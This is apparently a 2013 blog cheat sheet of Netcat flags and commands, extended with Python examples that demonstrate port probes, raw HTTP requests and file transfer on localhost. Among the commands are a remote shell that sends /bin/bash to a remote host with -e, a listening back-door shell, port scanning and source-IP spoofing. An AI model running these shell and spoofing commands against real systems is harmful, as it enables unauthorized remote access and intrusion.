Saturday, 10 August 2013

Basic Netcat commands

-e prog inbound program to exec (dangerous!!)
-g gateway source-routing hop point(s), up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose (use twice to be more verbose)
-w secs timeout for connects and final net reads
-z zero-I/O mode (used for scanning)
port numbers can be individual or ranges: m-n (inclusive)

Connect to a port on a remote host

nc remote_host <port>

Connect to multiple ports on a remote host

nc remote_host <port> <port> ...
For example:
nc www.somecompanyasanexample.com 21 25 80

Listen on a port for incoming connections (also known as a back door)

nc -v -l -p <port>

Connect to a remote host and serve a bash shell

nc remote_ip <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To make
Netcat support the -e flag, it must be recompiled with
GAPING_SECURITY_HOLE defined (-DGAPING_SECURITY_HOLE); this is the
option the help text marks as "dangerous!!".


Listen on a port and serve a bash shell upon connect

nc -v -l -p <port> -e /bin/bash
(See the note above: -e is only available when Netcat was compiled
with GAPING_SECURITY_HOLE defined.)


Port scan a remote host

nc -v -z remote_host <port>-<port>
Use the -i flag to set a delay interval between ports:
nc -i <seconds> -v -z remote_host <port>-<port>
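What a -z probe actually is on the wire, and what the listening side sees, written out with plain Python sockets so it runs without netcat. This is an added example, not code from the original post; the names (zero_io_probe, probe_range, ConnectionLog, start_listener, demo) are my own, and the listener is constructed for the demo.

```python
"""Zero-I/O probe (what `nc -z` does) seen from both ends.
One side completes the TCP handshake, sends nothing and closes; the other
side is a listener that records what a real service would observe."""
import socket
import threading
import time


class ConnectionLog:
    """What the listening service observes: (peer address, bytes received)."""

    def __init__(self):
        self.entries = []
        self._lock = threading.Lock()

    def add(self, peer, nbytes):
        with self._lock:
            self.entries.append((peer, nbytes))


def start_listener(log):
    """Listen on 127.0.0.1 on an ephemeral port (stands in for `nc -l -p`)
    and log every accepted connection with the byte count the peer sent."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, peer = srv.accept()
            except OSError:          # listening socket closed: stop serving
                return
            total = 0
            with conn:
                conn.settimeout(1.0)
                try:
                    while True:
                        chunk = conn.recv(4096)
                        if not chunk:    # peer closed: EOF
                            break
                        total += len(chunk)
                except socket.timeout:
                    pass
            log.add(peer, total)

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def zero_io_probe(host, port, timeout=2.0):
    """`nc -z -w <timeout> host port`: finish the handshake, send nothing,
    close. True means the port accepted the connection."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return True
    except OSError:                  # refused, unreachable or timed out
        return False
    finally:
        s.close()


def probe_range(host, ports, timeout=2.0, delay=0.0):
    """Probe each port, pausing `delay` seconds between them (the -i flag);
    return the sorted list of ports that accepted."""
    accepted = []
    for p in ports:
        if zero_io_probe(host, p, timeout):
            accepted.append(p)
        time.sleep(delay)
    return sorted(accepted)


def demo():
    """Probe one listening port and one closed port on localhost; return
    what the prober concluded and what the listener logged."""
    log = ConnectionLog()
    srv, open_port = start_listener(log)
    # A closed port: bind an ephemeral port and release it again (constructed).
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()
    found = probe_range("127.0.0.1", [open_port, closed_port])
    for _ in range(100):             # let the listener thread log the connect
        if log.entries:
            break
        time.sleep(0.02)
    srv.close()
    return {"open_port": open_port, "closed_port": closed_port,
            "found": found, "listener_saw": list(log.entries)}
```

From the service's point of view a -z scan is a fully accepted connection that closes with zero bytes received; a burst of such connections from one address across many ports is the pattern to alert on in connection logs, and it is why the help text calls -z "zero-I/O mode".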

Pipe command output to a netcat request

<command> | nc remote_host <port>
For example, a minimal HTTP request (the request line must be followed
by a blank line, otherwise the server keeps waiting for more headers):
printf 'GET / HTTP/1.0\r\n\r\n' | nc www.somecompanyasanexample.com 80
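The same HTTP/1.0 request, as an added example (not code from the original post) written with plain Python sockets and run against a small local server constructed for the demo. It shows the part the pipe hides: the CRLF line endings, the blank line that terminates the request, and a read timeout playing the role of -w. Function names are my own.

```python
"""Minimal HTTP/1.0 GET over a raw TCP connection, the way `printf ... | nc`
does it, plus a local server to answer it."""
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def build_request(path="/", host=None):
    """Return the bytes of a minimal HTTP/1.0 GET. Each line ends in CRLF and
    the request ends with an empty line (CRLF CRLF); without that empty line
    the server waits for more headers and nothing comes back."""
    lines = [f"GET {path} HTTP/1.0"]
    if host:
        lines.append(f"Host: {host}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def fetch(host, port, path="/", timeout=3.0):
    """Connect, send the request, read until the server closes (HTTP/1.0
    closes after one response) and return (status_line, body_bytes).
    `timeout` bounds every blocking call, like nc -w."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(path, host))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:             # server closed: response complete
                break
            chunks.append(data)
    raw = b"".join(chunks)
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0].decode("ascii", "replace")
    return status_line, body


class _DemoHandler(BaseHTTPRequestHandler):
    """In-process server constructed for the demo; answers any GET."""
    protocol_version = "HTTP/1.0"

    def do_GET(self):
        body = b"hello from the demo server\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):    # keep the demo quiet
        pass


def demo():
    """Start the demo server on an ephemeral port, fetch "/", return the
    (status_line, body) pair the client reconstructed."""
    srv = HTTPServer(("127.0.0.1", 0), _DemoHandler)
    port = srv.server_address[1]
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return fetch("127.0.0.1", port)
    finally:
        srv.shutdown()
        srv.server_close()
```

Reading until the peer closes is exactly what `nc` does after stdin hits EOF, which is why the HTTP/1.0 form (server closes after the response) works well with a pipe while a keep-alive HTTP/1.1 request would sit there until -w expires.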


Use source-routing to connect to a port on a remote host

nc -g <gateway> remote_host <port>
Note: Up to eight hop points may be specified using the -g flag.
Use the -G flag to specify the source-routing pointer.
Most routers and hosts today drop source-routed packets, so expect
this to fail outside networks that explicitly allow IP source routing.


Spoof source IP address

Use the -s flag to set the source IP address:
nc -s spoofed_ip remote_host port
This command will cause the remote host to respond back to the
spoofed IP address; because the replies go there rather than to the
sending host, a TCP handshake started this way cannot complete. The -s
flag can be used along with most of the commands presented in this
table.


Transfer a file

On the server host:
nc -v -l -p <port> < <file>
On the client host:
nc -v <server_host> <port> > <file>
It is also possible for the client host to listen on a port in order to
receive a file. To do this, run the following command on the client
host:
nc -v -l -p <port> > <file>
And run the following command on the server host:
nc -v <client_host> <port> < <file>
In both directions the transfer ends when the sending side reaches end
of file and closes its socket; netcat does not check that everything
arrived, so compare a checksum of the file on both hosts afterwards.
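Both file-transfer directions above, as an added example (not code from the original post) using plain Python sockets so it runs without netcat, followed by the SHA-256 comparison you would do by hand on both hosts. The listener accepts the first connection from whoever reaches the port and the bytes travel in the clear, which is why the checksum is done out of band. All function names and the sample payload are my own.

```python
"""Raw TCP file transfer as netcat does it, in both directions, plus the
out-of-band integrity check netcat itself does not perform."""
import hashlib
import socket
import threading


def sha256_of(data):
    """What `sha256sum <file>` prints on either host."""
    return hashlib.sha256(data).hexdigest()


def _listen_local():
    """Bind 127.0.0.1 on an ephemeral port (stands in for `nc -l -p <port>`)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def _send_file(conn, data):
    """Stream the payload, then half-close: the receiver sees EOF, which is
    what `nc ... < file` relies on once stdin is exhausted."""
    conn.sendall(data)
    conn.shutdown(socket.SHUT_WR)


def _recv_file(conn):
    """Read until the peer closes; that is the only end-of-file signal."""
    chunks = []
    while True:
        chunk = conn.recv(65536)
        if not chunk:
            return b"".join(chunks)
        chunks.append(chunk)


def transfer(data, sender_listens, timeout=5.0):
    """Move `data` over one localhost TCP connection and return the bytes the
    receiver wrote.
    sender_listens=True : `nc -l -p <port> < file` / `nc host <port> > file`
    sender_listens=False: `nc -l -p <port> > file` / `nc host <port> < file`"""
    srv, port = _listen_local()
    result = {}

    def listener_side():
        conn, _ = srv.accept()       # first connection wins, whoever it is
        conn.settimeout(timeout)
        with conn:
            if sender_listens:
                _send_file(conn, data)
            else:
                result["received"] = _recv_file(conn)

    t = threading.Thread(target=listener_side, daemon=True)
    t.start()
    with socket.create_connection(("127.0.0.1", port), timeout=timeout) as c:
        if sender_listens:
            result["received"] = _recv_file(c)
        else:
            _send_file(c, data)
    t.join(timeout)
    srv.close()
    return result["received"]


def verify_transfer(original, received):
    """Compare the two checksums as you would after running sha256sum on
    both hosts. Returns (ok, sha256_original, sha256_received)."""
    h1, h2 = sha256_of(original), sha256_of(received)
    return h1 == h2, h1, h2


if __name__ == "__main__":
    payload = bytes(range(256)) * 2000          # constructed 512000-byte "file"
    got = transfer(payload, sender_listens=True)
    ok, h_orig, h_recv = verify_transfer(payload, got)
    print("server-listens transfer ok:", ok, h_orig[:16], h_recv[:16])
    got = transfer(payload, sender_listens=False)
    ok, h_orig, h_recv = verify_transfer(payload, got)
    print("client-listens transfer ok:", ok, h_orig[:16], h_recv[:16])
```

A truncated transfer (connection dropped, or the listener hit by a stray connection first) looks identical to a complete one at the receiving prompt; only the checksum comparison tells them apart.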

All of these commands use the flags listed in the help output at the top of this post; flag support differs between netcat variants, so check your own nc -h before relying on one.
